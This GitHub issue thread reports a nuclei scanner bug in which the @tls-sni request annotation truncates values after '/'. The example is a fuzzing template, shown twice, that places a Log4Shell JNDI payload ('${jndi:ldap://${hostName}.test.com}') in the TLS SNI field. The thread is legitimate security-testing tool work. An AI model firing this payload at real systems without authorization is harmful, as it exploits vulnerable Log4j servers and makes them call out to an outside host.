### ISSUE TITLE
nuclei delete anything after / while tring to use @tls-sni as log4j payload :)

### ISSUE THREAD

**Issue by 0xAwali** [projectdiscovery/nuclei#4452]
while fuzzing log4j through sni value , I figured out nuclei delete anything after /

```
id: SNIFUZZer

info:
  name: Server Name Inticator FUZZer
  author: 0xAwali
  severity: info

variables:
  LOG4J: '${jndi:ldap://${hostName}.test.com}'

http:
  - raw:
      - |
        @tls-sni:{{LOG4J}}
        GET / HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/{{rand_int(1000000,9999999)}} Firefox/102.0
        Upgrade-Insecure-Requests: 1
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: same-origin
        Sec-Fetch-User: ?1
        Pragma: no-cache
        Cache-Control: no-cache
        Te: trailers

```

![Screenshot_2023-12-02_07_57_55](https://github.com/projectdiscovery/nuclei/assets/54332136/d6d6e450-7f33-4c53-b372-c9547183811b)

**Comment by jimen0** [comment]
According to the docs on https://docs.projectdiscovery.io/templates/protocols/http/request-tampering#requests-annotation arbitrary literals are supported. However that isn't the case.

I've created #4462 to fix this but haven't thoroughly tested it. You might be able to test it @0xAwali 😃

**Comment by dogancanbakir** [comment]
@0xAwali, Could you try again while setting the [`unsafe: true`](https://docs.projectdiscovery.io/templates/protocols/http/unsafe-http)?
```yaml
id: SNIFUZZer

info:
  name: Server Name Inticator FUZZer
  author: 0xAwali
  severity: info

variables:
  LOG4J: '${jndi:ldap://${hostName}.test.com}'

http:
  - raw:
      - |
        @tls-sni:{{LOG4J}}
        GET / HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/{{rand_int(1000000,9999999)}} Firefox/102.0
        Upgrade-Insecure-Requests: 1
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: same-origin
        Sec-Fetch-User: ?1
        Pragma: no-cache
        Cache-Control: no-cache
        Te: trailers
    unsafe: true
```
